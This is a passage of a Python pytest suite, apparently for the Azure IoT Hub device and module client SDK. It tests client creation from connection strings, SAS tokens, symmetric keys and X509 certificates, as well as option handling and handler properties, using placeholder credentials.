"Sets the 'proxy_options' user option parameter on the PipelineConfig, if provided"
)
def test_proxy_options(
self,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
proxy_options = ProxyOptions(proxy_type=socks.HTTP, proxy_addr="127.0.0.1", proxy_port=8888)
client_create_method(*create_method_args, proxy_options=proxy_options)
# Get configuration object, and ensure it was used for both protocol pipelines
assert mock_mqtt_pipeline_init.call_count == 1
config = mock_mqtt_pipeline_init.call_args[0][0]
assert isinstance(config, IoTHubPipelineConfig)
assert config == mock_http_pipeline_init.call_args[0][0]
assert config.proxy_options is proxy_options
@pytest.mark.it(
"Sets the 'keep_alive' user option parameter on the PipelineConfig, if provided"
)
def test_keep_alive_options(
self,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
keepalive_value = 60
client_create_method(*create_method_args, keep_alive=keepalive_value)
# Get configuration object, and ensure it was used for both protocol pipelines
assert mock_mqtt_pipeline_init.call_count == 1
config = mock_mqtt_pipeline_init.call_args[0][0]
assert isinstance(config, IoTHubPipelineConfig)
assert config == mock_http_pipeline_init.call_args[0][0]
assert config.keep_alive == keepalive_value
@pytest.mark.it("Raises a TypeError if an invalid user option parameter is provided")
def test_invalid_option(
self, option_test_required_patching, client_create_method, create_method_args
):
with pytest.raises(TypeError):
client_create_method(*create_method_args, invalid_option="some_value")
@pytest.mark.it("Sets default user options if none are provided")
def test_default_options(
self,
mocker,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
client_create_method(*create_method_args)
# Both pipelines use the same IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] is mock_http_pipeline_init.call_args[0][0]
config = mock_mqtt_pipeline_init.call_args[0][0]
assert isinstance(config, IoTHubPipelineConfig)
# Pipeline Config has default options set that were not user-specified
assert config.product_info == ""
assert config.websockets is False
assert config.cipher == ""
assert config.proxy_options is None
assert config.server_verification_cert is None
assert config.keep_alive == DEFAULT_KEEPALIVE
# TODO: consider splitting this test class up into device/module specific test classes to avoid
# the conditional logic in some tests
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubClientCreateFromConnectionStringTests(
SharedIoTHubClientCreateMethodUserOptionTests
):
@pytest.fixture
def client_create_method(self, client_class):
"""Provides the specific create method for use in universal tests"""
return client_class.create_from_connection_string
@pytest.fixture
def create_method_args(self, connection_string):
"""Provides the specific create method args for use in universal tests"""
return [connection_string]
@pytest.mark.it(
"Creates a SasToken that uses a SymmetricKeySigningMechanism, from the values in the provided connection string"
)
def test_sastoken(self, mocker, client_class, connection_string):
sksm_mock = mocker.patch.object(auth, "SymmetricKeySigningMechanism")
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
cs_obj = cs.ConnectionString(connection_string)
custom_ttl = 1000
client_class.create_from_connection_string(connection_string, sastoken_ttl=custom_ttl)
# Determine expected URI based on class under test
if client_class.__name__ == "IoTHubDeviceClient":
expected_uri = "{hostname}/devices/{device_id}".format(
hostname=cs_obj[cs.HOST_NAME], device_id=cs_obj[cs.DEVICE_ID]
)
else:
expected_uri = "{hostname}/devices/{device_id}/modules/{module_id}".format(
hostname=cs_obj[cs.HOST_NAME],
device_id=cs_obj[cs.DEVICE_ID],
module_id=cs_obj[cs.MODULE_ID],
)
# SymmetricKeySigningMechanism created using the connection string's SharedAccessKey
assert sksm_mock.call_count == 1
assert sksm_mock.call_args == mocker.call(key=cs_obj[cs.SHARED_ACCESS_KEY])
# Token was created with a SymmetricKeySigningMechanism, the expected URI, and custom ttl
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
expected_uri, sksm_mock.return_value, ttl=custom_ttl
)
@pytest.mark.it(
"Uses 3600 seconds (1 hour) as the default SasToken TTL if no custom TTL is provided"
)
def test_sastoken_default(self, mocker, client_class, connection_string):
sksm_mock = mocker.patch.object(auth, "SymmetricKeySigningMechanism")
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
cs_obj = cs.ConnectionString(connection_string)
client_class.create_from_connection_string(connection_string)
# Determine expected URI based on class under test
if client_class.__name__ == "IoTHubDeviceClient":
expected_uri = "{hostname}/devices/{device_id}".format(
hostname=cs_obj[cs.HOST_NAME], device_id=cs_obj[cs.DEVICE_ID]
)
else:
expected_uri = "{hostname}/devices/{device_id}/modules/{module_id}".format(
hostname=cs_obj[cs.HOST_NAME],
device_id=cs_obj[cs.DEVICE_ID],
module_id=cs_obj[cs.MODULE_ID],
)
# SymmetricKeySigningMechanism created using the connection string's SharedAccessKey
assert sksm_mock.call_count == 1
assert sksm_mock.call_args == mocker.call(key=cs_obj[cs.SHARED_ACCESS_KEY])
# Token was created with a SymmetricKeySigningMechanism, the expected URI, and default ttl
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
expected_uri, sksm_mock.return_value, ttl=3600
)
@pytest.mark.it(
"Creates MQTT and HTTP Pipelines with an IoTHubPipelineConfig object containing the SasToken and values from the connection string"
)
def test_pipeline_config(
self,
mocker,
client_class,
connection_string,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
cs_obj = cs.ConnectionString(connection_string)
client_class.create_from_connection_string(connection_string)
# Verify pipelines created with an IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] is mock_http_pipeline_init.call_args[0][0]
assert isinstance(mock_mqtt_pipeline_init.call_args[0][0], IoTHubPipelineConfig)
# Verify the IoTHubPipelineConfig is constructed as expected
config = mock_mqtt_pipeline_init.call_args[0][0]
assert config.device_id == cs_obj[cs.DEVICE_ID]
assert config.hostname == cs_obj[cs.HOST_NAME]
assert config.sastoken is sastoken_mock.return_value
if client_class.__name__ == "IoTHubModuleClient":
assert config.module_id == cs_obj[cs.MODULE_ID]
assert config.blob_upload is False
assert config.method_invoke is False
else:
assert config.module_id is None
assert config.blob_upload is True
assert config.method_invoke is False
if cs_obj.get(cs.GATEWAY_HOST_NAME):
assert config.gateway_hostname == cs_obj[cs.GATEWAY_HOST_NAME]
else:
assert config.gateway_hostname is None
@pytest.mark.it(
"Returns an instance of an IoTHub client using the created MQTT and HTTP pipelines"
)
def test_client_returned(
self,
mocker,
client_class,
connection_string,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
client = client_class.create_from_connection_string(connection_string)
assert isinstance(client, client_class)
assert client._mqtt_pipeline is mock_mqtt_pipeline_init.return_value
assert client._http_pipeline is mock_http_pipeline_init.return_value
@pytest.mark.it("Raises ValueError when given an invalid connection string")
@pytest.mark.parametrize(
"bad_cs",
[
pytest.param("not-a-connection-string", id="Garbage string"),
pytest.param(
"HostName=value.domain.net;DeviceId=my_device;SharedAccessKey=Invalid",
id="Shared Access Key invalid",
),
pytest.param(
"HostName=value.domain.net;WrongValue=Invalid;SharedAccessKey=Zm9vYmFy",
id="Contains extraneous data",
),
pytest.param("HostName=value.domain.net;DeviceId=my_device", id="Incomplete"),
],
)
def test_raises_value_error_on_bad_connection_string(self, client_class, bad_cs):
with pytest.raises(ValueError):
client_class.create_from_connection_string(bad_cs)
@pytest.mark.it("Raises ValueError if a SasToken creation results in failure")
def test_raises_value_error_on_sastoken_failure(self, mocker, client_class, connection_string):
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
token_err = st.SasTokenError("Some SasToken failure")
sastoken_mock.side_effect = token_err
with pytest.raises(ValueError) as e_info:
client_class.create_from_connection_string(connection_string)
assert e_info.value.__cause__ is token_err
class SharedIoTHubClientPROPERTYHandlerTests(object):
@pytest.mark.it("Can have its value set and retrieved")
def test_read_write(self, client, handler, handler_name):
assert getattr(client, handler_name) is None
setattr(client, handler_name, handler)
assert getattr(client, handler_name) is handler
@pytest.mark.it("Reflects the value of the handler manager property of the same name")
def test_set_on_handler_manager(self, client, handler, handler_name):
assert getattr(client, handler_name) is None
assert getattr(client, handler_name) is getattr(client._handler_manager, handler_name)
setattr(client, handler_name, handler)
assert getattr(client, handler_name) is handler
assert getattr(client, handler_name) is getattr(client._handler_manager, handler_name)
@pytest.mark.it(
"Implicitly enables the corresponding feature if not already enabled, when a handler value is set"
)
def test_enables_feature_only_if_not_already_enabled(
self, mocker, client, handler, handler_name, feature_name, mqtt_pipeline
):
# Feature will appear disabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
# Set handler
setattr(client, handler_name, handler)
# Feature was enabled
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == feature_name
mqtt_pipeline.enable_feature.reset_mock()
# Feature will appear already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True
# Set handler
setattr(client, handler_name, handler)
# Feature was not enabled again
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it(
"Implicitly disables the corresponding feature if not already disabled, when handler value is set back to None"
)
def test_disables_feature_only_if_not_already_disabled(
self, mocker, client, handler_name, feature_name, mqtt_pipeline
):
# Feature will appear enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True
# Set handler to None
setattr(client, handler_name, None)
# Feature was disabled
assert mqtt_pipeline.disable_feature.call_count == 1
assert mqtt_pipeline.disable_feature.call_args[0][0] == feature_name
mqtt_pipeline.disable_feature.reset_mock()
# Feature will appear already disabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
# Set handler to None
setattr(client, handler_name, None)
# Feature was not disabled again
assert mqtt_pipeline.disable_feature.call_count == 0
@pytest.mark.it(
"Locks the client to Handler Receive Mode if the receive mode has not yet been set"
)
def test_receive_mode_not_set(self, client, handler, handler_name):
assert client._receive_type is RECEIVE_TYPE_NONE_SET
setattr(client, handler_name, handler)
assert client._receive_type is RECEIVE_TYPE_HANDLER
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to Handler Receive Mode"
)
def test_receive_mode_set_handler(self, client, handler, handler_name):
client._receive_type = RECEIVE_TYPE_HANDLER
setattr(client, handler_name, handler)
assert client._receive_type is RECEIVE_TYPE_HANDLER
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has already been set to API Receive Mode"
)
def test_receive_mode_set_api(self, client, handler, handler_name, mqtt_pipeline):
client._receive_type = RECEIVE_TYPE_API
# Error was raised
with pytest.raises(client_exceptions.ClientError):
setattr(client, handler_name, handler)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# NOTE: If more properties are added, this class should become a general purpose properties testclass
class SharedIoTHubClientPROPERTYConnectedTests(object):
@pytest.mark.it("Cannot be changed")
def test_read_only(self, client):
with pytest.raises(AttributeError):
client.connected = not client.connected
@pytest.mark.it("Reflects the value of the root stage property of the same name")
def test_reflects_pipeline_property(self, client, mqtt_pipeline):
mqtt_pipeline.connected = True
assert client.connected
mqtt_pipeline.connected = False
assert not client.connected
class SharedIoTHubClientOCCURANCEConnectTests(object):
@pytest.mark.it("Ensures that the HandlerManager is running")
def test_ensure_handler_manager_running_on_connect(self, client, mocker):
ensure_running_spy = mocker.spy(client._handler_manager, "ensure_running")
client._on_connected()
assert ensure_running_spy.call_count == 1
class SharedIoTHubClientOCCURANCEDisconnectTests(object):
@pytest.mark.it("Clears all pending MethodRequests upon disconnect")
def test_state_change_handler_clears_method_request_inboxes_on_disconnect(self, client, mocker):
clear_method_request_spy = mocker.spy(client._inbox_manager, "clear_all_method_requests")
client._on_disconnected()
assert clear_method_request_spy.call_count == 1
##############################
# SHARED DEVICE CLIENT TESTS #
##############################
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubDeviceClientCreateFromSastokenTests(
SharedIoTHubClientCreateMethodUserOptionTests
):
@pytest.fixture
def client_create_method(self, client_class):
"""Provides the specific create method for use in universal tests"""
return client_class.create_from_sastoken
@pytest.fixture
def create_method_args(self, sas_token_string):
"""Provides the specific create method args for use in universal tests"""
return [sas_token_string]
@pytest.mark.it(
"Creates a NonRenewableSasToken from the SAS token string provided in parameters"
)
def test_sastoken(self, mocker, client_class, sas_token_string):
real_sastoken = st.NonRenewableSasToken(sas_token_string)
sastoken_mock = mocker.patch.object(st, "NonRenewableSasToken")
sastoken_mock.return_value = real_sastoken
client_class.create_from_sastoken(sastoken=sas_token_string)
# NonRenewableSasToken created from sastoken string
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(sas_token_string)
@pytest.mark.it(
"Creates MQTT and HTTP pipelines with an IoTHubPipelineConfig object containing the SasToken and values extracted from the SasToken"
)
def test_pipeline_config(
self,
mocker,
client_class,
sas_token_string,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
real_sastoken = st.NonRenewableSasToken(sas_token_string)
sastoken_mock = mocker.patch.object(st, "NonRenewableSasToken")
sastoken_mock.return_value = real_sastoken
client_class.create_from_sastoken(sas_token_string)
token_uri_pieces = real_sastoken.resource_uri.split("/")
expected_hostname = token_uri_pieces[0]
expected_device_id = token_uri_pieces[2]
# Verify pipelines created with an IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] is mock_http_pipeline_init.call_args[0][0]
assert isinstance(mock_mqtt_pipeline_init.call_args[0][0], IoTHubPipelineConfig)
# Verify the IoTHubPipelineConfig is constructed as expected
config = mock_mqtt_pipeline_init.call_args[0][0]
assert config.device_id == expected_device_id
assert config.module_id is None
assert config.hostname == expected_hostname
assert config.gateway_hostname is None
assert config.sastoken is sastoken_mock.return_value
assert config.blob_upload is True
assert config.method_invoke is False
@pytest.mark.it(
"Returns an instance of an IoTHubDeviceClient using the created MQTT and HTTP pipelines"
)
def test_client_returned(
self,
mocker,
client_class,
sas_token_string,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
client = client_class.create_from_sastoken(sastoken=sas_token_string)
assert isinstance(client, client_class)
assert client._mqtt_pipeline is mock_mqtt_pipeline_init.return_value
assert client._http_pipeline is mock_http_pipeline_init.return_value
@pytest.mark.it("Raises ValueError if NonRenewableSasToken creation results in failure")
def test_raises_value_error_on_sastoken_failure(self, sas_token_string, mocker, client_class):
# NOTE: specific inputs that could cause this are tested in the sastoken test module
sastoken_mock = mocker.patch.object(st, "NonRenewableSasToken")
token_err = st.SasTokenError("Some SasToken failure")
sastoken_mock.side_effect = token_err
with pytest.raises(ValueError) as e_info:
client_class.create_from_sastoken(sastoken=sas_token_string)
assert e_info.value.__cause__ is token_err
@pytest.mark.it("Raises ValueError if the provided SAS token string has an invalid URI")
@pytest.mark.parametrize(
"invalid_token_uri",
[
pytest.param("some.hostname/devices", id="Too short"),
pytest.param("some.hostname/devices/my_device/somethingElse", id="Too long"),
pytest.param(
"some.hostname/not-devices/device_id", id="Incorrectly formatted device notation"
),
pytest.param("some.hostname/devices/my_device/modules/my_module", id="Module URI"),
],
)
def test_raises_value_error_invalid_uri(self, mocker, client_class, invalid_token_uri):
sastoken_str = "SharedAccessSignature sr={resource}&sig={signature}&se={expiry}".format(
resource=urllib.parse.quote(invalid_token_uri, safe=""),
signature=urllib.parse.quote("ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI=", safe=""),
expiry=int(time.time() + 3600),
)
with pytest.raises(ValueError):
client_class.create_from_sastoken(sastoken=sastoken_str)
@pytest.mark.it("Raises ValueError if the provided SAS token string has already expired")
def test_expired_token(self, mocker, client_class):
sastoken_str = "SharedAccessSignature sr={resource}&sig={signature}&se={expiry}".format(
resource=urllib.parse.quote("some.hostname/devices/my_device", safe=""),
signature=urllib.parse.quote("ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI=", safe=""),
expiry=int(time.time() - 3600), # expired
)
with pytest.raises(ValueError):
client_class.create_from_sastoken(sastoken=sastoken_str)
@pytest.mark.it("Raises a TypeError if the 'sastoken_ttl' kwarg is supplied by the user")
def test_sastoken_ttl(self, client_class, sas_token_string):
with pytest.raises(TypeError):
client_class.create_from_sastoken(sastoken=sas_token_string, sastoken_ttl=1000)
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubDeviceClientCreateFromSymmetricKeyTests(
SharedIoTHubClientCreateMethodUserOptionTests
):
hostname = "durmstranginstitute.farend"
device_id = "MySnitch"
symmetric_key = "Zm9vYmFy"
@pytest.fixture
def client_create_method(self, client_class):
"""Provides the specific create method for use in universal tests"""
return client_class.create_from_symmetric_key
@pytest.fixture
def create_method_args(self):
"""Provides the specific create method args for use in universal tests"""
return [self.symmetric_key, self.hostname, self.device_id]
@pytest.mark.it(
"Creates a SasToken that uses a SymmetricKeySigningMechanism, from the values provided in parameters"
)
def test_sastoken(self, mocker, client_class):
sksm_mock = mocker.patch.object(auth, "SymmetricKeySigningMechanism")
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
expected_uri = "{hostname}/devices/{device_id}".format(
hostname=self.hostname, device_id=self.device_id
)
custom_ttl = 1000
client_class.create_from_symmetric_key(
symmetric_key=self.symmetric_key,
hostname=self.hostname,
device_id=self.device_id,
sastoken_ttl=custom_ttl,
)
# SymmetricKeySigningMechanism created using the provided symmetric key
assert sksm_mock.call_count == 1
assert sksm_mock.call_args == mocker.call(key=self.symmetric_key)
# SasToken created with the SymmetricKeySigningMechanism, the expected URI, and the custom ttl
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
expected_uri, sksm_mock.return_value, ttl=custom_ttl
)
@pytest.mark.it(
"Uses 3600 seconds (1 hour) as the default SasToken TTL if no custom TTL is provided"
)
def test_sastoken_default(self, mocker, client_class):
sksm_mock = mocker.patch.object(auth, "SymmetricKeySigningMechanism")
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
expected_uri = "{hostname}/devices/{device_id}".format(
hostname=self.hostname, device_id=self.device_id
)
client_class.create_from_symmetric_key(
symmetric_key=self.symmetric_key, hostname=self.hostname, device_id=self.device_id
)
# SymmetricKeySigningMechanism created using the provided symmetric key
assert sksm_mock.call_count == 1
assert sksm_mock.call_args == mocker.call(key=self.symmetric_key)
# SasToken created with the SymmetricKeySigningMechanism, the expected URI, and the default ttl
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
expected_uri, sksm_mock.return_value, ttl=3600
)
@pytest.mark.it(
"Creates MQTT and HTTP pipelines with an IoTHubPipelineConfig object containing the SasToken and values provided in parameters"
)
def test_pipeline_config(
self, mocker, client_class, mock_mqtt_pipeline_init, mock_http_pipeline_init
):
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
client_class.create_from_symmetric_key(
symmetric_key=self.symmetric_key, hostname=self.hostname, device_id=self.device_id
)
# Verify pipelines created with an IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] is mock_http_pipeline_init.call_args[0][0]
assert isinstance(mock_mqtt_pipeline_init.call_args[0][0], IoTHubPipelineConfig)
# Verify the IoTHubPipelineConfig is constructed as expected
config = mock_mqtt_pipeline_init.call_args[0][0]
assert config.device_id == self.device_id
assert config.hostname == self.hostname
assert config.gateway_hostname is None
assert config.sastoken is sastoken_mock.return_value
assert config.blob_upload is True
assert config.method_invoke is False
@pytest.mark.it(
"Returns an instance of an IoTHubDeviceClient using the created MQTT and HTTP pipelines"
)
def test_client_returned(
self, mocker, client_class, mock_mqtt_pipeline_init, mock_http_pipeline_init
):
client = client_class.create_from_symmetric_key(
symmetric_key=self.symmetric_key, hostname=self.hostname, device_id=self.device_id
)
assert isinstance(client, client_class)
assert client._mqtt_pipeline is mock_mqtt_pipeline_init.return_value
assert client._http_pipeline is mock_http_pipeline_init.return_value
@pytest.mark.it("Raises ValueError if a SasToken creation results in failure")
def test_raises_value_error_on_sastoken_failure(self, mocker, client_class):
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
token_err = st.SasTokenError("Some SasToken failure")
sastoken_mock.side_effect = token_err
with pytest.raises(ValueError) as e_info:
client_class.create_from_symmetric_key(
symmetric_key=self.symmetric_key, hostname=self.hostname, device_id=self.device_id
)
assert e_info.value.__cause__ is token_err
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubDeviceClientCreateFromX509CertificateTests(
SharedIoTHubClientCreateMethodUserOptionTests
):
hostname = "durmstranginstitute.farend"
device_id = "MySnitch"
@pytest.fixture
def client_create_method(self, client_class):
"""Provides the specific create method for use in universal tests"""
return client_class.create_from_x509_certificate
@pytest.fixture
def create_method_args(self, x509):
"""Provides the specific create method args for use in universal tests"""
return [x509, self.hostname, self.device_id]
@pytest.mark.it(
"Creates MQTT and HTTP pipelines with an IoTHubPipelineConfig object containing the X509 and other values provided in parameters"
)
def test_pipeline_config(
self, mocker, client_class, x509, mock_mqtt_pipeline_init, mock_http_pipeline_init
):
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id
)
# Verify pipelines created with an IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] == mock_http_pipeline_init.call_args[0][0]
assert isinstance(mock_mqtt_pipeline_init.call_args[0][0], IoTHubPipelineConfig)
# Verify the IoTHubPipelineConfig is constructed as expected
config = mock_mqtt_pipeline_init.call_args[0][0]
assert config.device_id == self.device_id
assert config.hostname == self.hostname
assert config.gateway_hostname is None
assert config.x509 is x509
assert config.blob_upload is True
assert config.method_invoke is False
@pytest.mark.it(
"Returns an instance of an IoTHubDeviceclient using the created MQTT and HTTP pipelines"
)
def test_client_returned(
self, mocker, client_class, x509, mock_mqtt_pipeline_init, mock_http_pipeline_init
):
client = client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id
)
assert isinstance(client, client_class)
assert client._mqtt_pipeline is mock_mqtt_pipeline_init.return_value
assert client._http_pipeline is mock_http_pipeline_init.return_value
@pytest.mark.it("Raises a TypeError if the 'sastoken_ttl' kwarg is supplied by the user")
def test_sastoken_ttl(self, client_class, x509):
with pytest.raises(TypeError):
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, sastoken_ttl=1000
)
##############################
# SHARED MODULE CLIENT TESTS #
##############################
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubModuleClientCreateFromSastokenTests(
SharedIoTHubClientCreateMethodUserOptionTests
):
@pytest.fixture
def client_create_method(self, client_class):
"""Provides the specific create method for use in universal tests"""
return client_class.create_from_sastoken
@pytest.fixture
def create_method_args(self, sas_token_string):
"""Provides the specific create method args for use in universal tests"""
return [sas_token_string]
@pytest.mark.it(
"Creates a NonRenewableSasToken from the SAS token string provided in parameters"
)
def test_sastoken(self, mocker, client_class, sas_token_string):
real_sastoken = st.NonRenewableSasToken(sas_token_string)
sastoken_mock = mocker.patch.object(st, "NonRenewableSasToken")
sastoken_mock.return_value = real_sastoken
client_class.create_from_sastoken(sastoken=sas_token_string)
# NonRenewableSasToken created from sastoken string
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(sas_token_string)
@pytest.mark.it(
"Creates MQTT and HTTP pipelines with an IoTHubPipelineConfig object containing the SasToken and values extracted from the SasToken"
)
def test_pipeline_config(
self,
mocker,
client_class,
sas_token_string,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
real_sastoken = st.NonRenewableSasToken(sas_token_string)
sastoken_mock = mocker.patch.object(st, "NonRenewableSasToken")
sastoken_mock.return_value = real_sastoken
client_class.create_from_sastoken(sastoken=sas_token_string)
token_uri_pieces = real_sastoken.resource_uri.split("/")
expected_hostname = token_uri_pieces[0]
expected_device_id = token_uri_pieces[2]
expected_module_id = token_uri_pieces[4]
# Verify pipelines created with an IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] is mock_http_pipeline_init.call_args[0][0]
assert isinstance(mock_mqtt_pipeline_init.call_args[0][0], IoTHubPipelineConfig)
# Verify the IoTHubPipelineConfig is constructed as expected
config = mock_mqtt_pipeline_init.call_args[0][0]
assert config.device_id == expected_device_id
assert config.module_id == expected_module_id
assert config.hostname == expected_hostname
assert config.gateway_hostname is None
assert config.sastoken is sastoken_mock.return_value
assert config.blob_upload is False
assert config.method_invoke is False
@pytest.mark.it(
"Returns an instance of an IoTHubModuleClient using the created MQTT and HTTP pipelines"
)
def test_client_returned(
self,
mocker,
client_class,
sas_token_string,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
client = client_class.create_from_sastoken(sastoken=sas_token_string)
assert isinstance(client, client_class)
assert client._mqtt_pipeline is mock_mqtt_pipeline_init.return_value
assert client._http_pipeline is mock_http_pipeline_init.return_value
@pytest.mark.it("Raises ValueError if NonRenewableSasToken creation results in failure")
def test_raises_value_error_on_sastoken_failure(self, mocker, client_class, sas_token_string):
# NOTE: specific inputs that could cause this are tested in the sastoken test module
sastoken_mock = mocker.patch.object(st, "NonRenewableSasToken")
token_err = st.SasTokenError("Some SasToken failure")
sastoken_mock.side_effect = token_err
with pytest.raises(ValueError) as e_info:
client_class.create_from_sastoken(sastoken=sas_token_string)
assert e_info.value.__cause__ is token_err
@pytest.mark.it("Raises ValueError if the provided SAS token string has an invalid URI")
@pytest.mark.parametrize(
"invalid_token_uri",
[
pytest.param("some.hostname/devices/my_device/modules/", id="Too short"),
pytest.param(
"some.hostname/devices/my_device/modules/my_module/somethingElse", id="Too long"
),
pytest.param(
"some.hostname/not-devices/device_id/modules/module_id",
id="Incorrectly formatted device notation",
),
pytest.param(
"some.hostname/devices/device_id/not-modules/module_id",
id="Incorrectly formatted module notation",
),
pytest.param("some.hostname/devices/my_device/", id="Device URI"),
],
)
def test_raises_value_error_invalid_uri(self, mocker, client_class, invalid_token_uri):
sastoken_str = "SharedAccessSignature sr={resource}&sig={signature}&se={expiry}".format(
resource=urllib.parse.quote(invalid_token_uri, safe=""),
signature=urllib.parse.quote("ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI=", safe=""),
expiry=int(time.time() + 3600),
)
with pytest.raises(ValueError):
client_class.create_from_sastoken(sastoken=sastoken_str)
@pytest.mark.it("Raises ValueError if the provided SAS token string has already expired")
def test_expired_token(self, mocker, client_class):
sastoken_str = "SharedAccessSignature sr={resource}&sig={signature}&se={expiry}".format(
resource=urllib.parse.quote(
"some.hostname/devices/my_device/modules/my_module", safe=""
),
signature=urllib.parse.quote("ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI=", safe=""),
expiry=int(time.time() - 3600), # expired
)
with pytest.raises(ValueError):
client_class.create_from_sastoken(sastoken=sastoken_str)
@pytest.mark.it("Raises a TypeError if the 'sastoken_ttl' kwarg is supplied by the user")
def test_sastoken_ttl(self, client_class, sas_token_string):
with pytest.raises(TypeError):
client_class.create_from_sastoken(sastoken=sas_token_string, sastoken_ttl=1000)
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubModuleClientCreateFromX509CertificateTests(
SharedIoTHubClientCreateMethodUserOptionTests
):
hostname = "durmstranginstitute.farend"
device_id = "MySnitch"
module_id = "Charms"
@pytest.fixture
def client_create_method(self, client_class):
"""Provides the specific create method for use in universal tests"""
return client_class.create_from_x509_certificate
@pytest.fixture
def create_method_args(self, x509):
"""Provides the specific create method args for use in universal tests"""
return [x509, self.hostname, self.device_id, self.module_id]
@pytest.mark.it(
"Creates MQTT and HTTP pipelines with an IoTHubPipelineConfig object containing the X509 and other values provided in parameters"
)
def test_pipeline_config(
self, mocker, client_class, x509, mock_mqtt_pipeline_init, mock_http_pipeline_init
):
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, module_id=self.module_id
)
# Verify pipelines created with an IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] == mock_http_pipeline_init.call_args[0][0]
assert isinstance(mock_mqtt_pipeline_init.call_args[0][0], IoTHubPipelineConfig)
# Verify the IoTHubPipelineConfig is constructed as expected
config = mock_mqtt_pipeline_init.call_args[0][0]
assert config.device_id == self.device_id
assert config.hostname == self.hostname
assert config.gateway_hostname is None
assert config.x509 is x509
assert config.blob_upload is False
assert config.method_invoke is False
@pytest.mark.it(
"Returns an instance of an IoTHubDeviceclient using the created MQTT and HTTP pipelines"
)
def test_client_returned(
self, mocker, client_class, x509, mock_mqtt_pipeline_init, mock_http_pipeline_init
):
client = client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, module_id=self.module_id
)
assert isinstance(client, client_class)
assert client._mqtt_pipeline is mock_mqtt_pipeline_init.return_value
assert client._http_pipeline is mock_http_pipeline_init.return_value
@pytest.mark.it("Raises a TypeError if the 'sastoken_ttl' kwarg is supplied by the user")
def test_sastoken_ttl(self, client_class, x509):
with pytest.raises(TypeError):
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, sastoken_ttl=1000
)
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubModuleClientClientCreateFromEdgeEnvironmentUserOptionTests(
SharedIoTHubClientCreateMethodUserOptionTests
):
"""This class inherites the user option tests shared by all create method APIs, and overrides
